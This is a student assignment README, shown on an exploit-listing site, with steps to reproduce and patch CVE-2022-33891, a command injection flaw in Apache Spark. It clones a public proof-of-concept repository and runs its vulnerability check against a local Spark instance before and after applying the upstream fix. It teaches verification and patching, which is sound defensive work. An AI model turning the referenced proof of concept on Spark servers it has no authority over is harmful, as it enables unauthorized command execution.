Share
## https://sploitus.com/exploit?id=365C423D-366E-5297-B931-75034A149CF2
# EP3 - MAC0352 Redes deComputadores e Sistemas Distribuidos 2023

## Tópico: CVE-2022-33891

### Execução de comandos shell arbitrários em aplicação spark que utiliza autenticação via ACL

## Alunos

- Elinilson Vital
- Leoarndo Bozzetto

# CVE-2022-33891 Patch Instructions for Ubuntu 22.04

## Prerequisites

- Ubuntu 22.04
- Git
- Maven
- Python 3

## Steps to Apply the Patch

1. Clone the fix repository:

```bash
git clone https://github.com/elsvital/cve-2022-33891-fix.git
```

2. Change to the Spark directory without the patch:

```bash
cd spark-3.2.0-no-patch
```

3. Compile Spark without the patch:

```bash
sudo ./build/mvn -DskipTests clean package
```

4. Start the Spark service:

```bash
sudo ./sbin/start-master.sh
```

5. Clone the vulnerability verification POC repository:

```bash
git clone https://github.com/HuskyHacks/cve-2022-33891
```

6. Navigate to the POC source directory:

```bash
cd cve-2022-33891
```

7. Verify the vulnerability:

```bash
python3 poc.py -u http://localhost -p 8080 --check --verbose
```

8. Return to the main directory:

```bash
cd ..
```

9. Stop the Spark service:

```bash
sudo ./sbin/stop-master.sh
```

10. Apply the patch from the provided link or merge the changes into your local repository.

```bash
# Access: https://github.com/apache/spark/commit/1d524a88f6e93e9971a09f70eb2804dca51d578c
```

11. Recompile Spark with the patch applied:

```
sudo ./build/mvn -DskipTests clean package
```

12. Start the Spark service again:

```
sudo ./sbin/start-master.sh
```

13. Navigate back to the POC source directory:

```
cd cve-2022-33891
```

14. Confirm the vulnerability is patched:

```
python3 poc.py -u http://localhost -p 8080 --check --verbose
```

## Video Tutorial

For a video walkthrough of the patching process, watch the tutorial at:
[![Watch the video](https://img.youtube.com/vi/zXdWVvaL58U/hqdefault.jpg)](https://youtu.be/zXdWVvaL58U)

## Additional Notes

Replace `http://localhost` with the appropriate IP address or hostname of your Spark service if necessary.